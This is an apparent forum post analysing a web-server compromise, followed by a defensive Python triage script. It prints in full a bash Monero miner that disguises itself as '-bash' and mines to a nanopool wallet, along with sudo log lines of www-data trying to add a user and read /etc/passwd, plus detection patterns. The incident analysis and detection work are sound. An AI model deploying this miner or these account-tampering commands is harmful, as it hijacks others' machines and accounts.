mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" listd
mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "54e172662" | passwd --stdin listd
mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
it’s this code: https://forums.gentoo.org/viewtopic-t-1071762.html?sid=dd3123941f591f81c8ab5b8c4769dd1f
/tmp/.s/upd looks like:
#!/bin/bash
#[+] Miner v2.0 - 2017
#[+] Author: PRG @ #old UnderNet
wallet="4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8"
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
fi
echo $! > bash.pid

0 S www-data 18219 1 4 80 0 - 28841 futex_ 10:13 ? 00:00:19 -bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8 -p x
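A small triage script for the two artifacts in this post, added here as an example and not part of the original post or the miner's code: it parses the sudo refusal lines (a web service account trying useradd/passwd as root) and the ps row where a miner hides behind the login-shell name "-bash" (the `-s $HIDE` trick above). The SERVICE_ACCOUNTS set, the marker list and the WALLET_ADDRESS placeholder are assumptions.

```python
import re
# Sample input, taken from the sudo log and ps -elf line in the post above (wallet replaced by a placeholder).
SUDO_LOG = """\
mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" listd
mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "54e172662" | passwd --stdin listd
mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
"""
PS_LINE = "0 S www-data 18219 1 4 80 0 - 28841 futex_ 10:13 ? 00:00:19 -bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u WALLET_ADDRESS -p x"

SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}   # assumed: accounts that never legitimately use sudo
# account tools invoked as a command (bare name or under a bin dir), so 'cat /etc/passwd' is not a hit
ACCOUNT_TOOL_RE = re.compile(r"(?:^|\s|/s?bin/)(?:useradd|adduser|usermod|passwd|chpasswd)\b")
MINER_MARKERS = ("stratum+tcp://", "stratum+ssl://", "cryptonight", "xmrig")

def parse_sudo_line(line):
    if line.count(" : ") < 3: return None                 # not a sudo syslog line
    host, ts, user, rest = line.split(" : ", 3)           # host : time : user : msg ; K=V ; K=V ...
    parts = rest.split(" ; ")
    rec = dict(p.partition("=")[::2] for p in parts[1:])  # TTY, PWD, USER, COMMAND (value may hold '=')
    rec.update(host=host, ts=ts, user=user, msg=parts[0])
    return rec

def sudo_findings(log_text):
    out = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if not rec or "NOT in sudoers" not in rec["msg"] or rec["user"] not in SERVICE_ACCOUNTS:
            continue
        cmd = rec.get("COMMAND", "")
        sev = "high" if ACCOUNT_TOOL_RE.search(cmd) else "medium"   # account tampering outranks reading files
        out.append((sev, rec["user"], rec.get("USER", "?"), cmd))
    return out

def ps_findings(ps_text):
    out = []
    for line in ps_text.splitlines():
        cols = line.split(None, 14)          # ps -elf: 14 fixed columns, then CMD with its own spaces
        if len(cols) < 15: continue
        uid, pid, ppid, cmd = cols[2], cols[3], cols[4], cols[14]
        argv = cmd.split()
        checks = [  # a real login shell gets argv[0] "-bash" and nothing else
            (argv[0] in ("-bash", "-sh") and len(argv) > 1, "login-shell name with extra arguments"),
            (any(m in cmd for m in MINER_MARKERS), "mining pool/algorithm marker in cmdline"),
            (ppid == "1" and uid in SERVICE_ACCOUNTS, "orphaned (PPID 1) process owned by a service account"),
        ]
        reasons = [text for hit, text in checks if hit]
        if reasons:
            out.append((pid, uid, reasons))
    return out
```

Run against a live box with `sudo_findings(open("/var/log/auth.log").read())` and `ps_findings(subprocess.check_output(["ps", "-elf"], text=True))`; the first sudo refusal from www-data is worth an alert on its own.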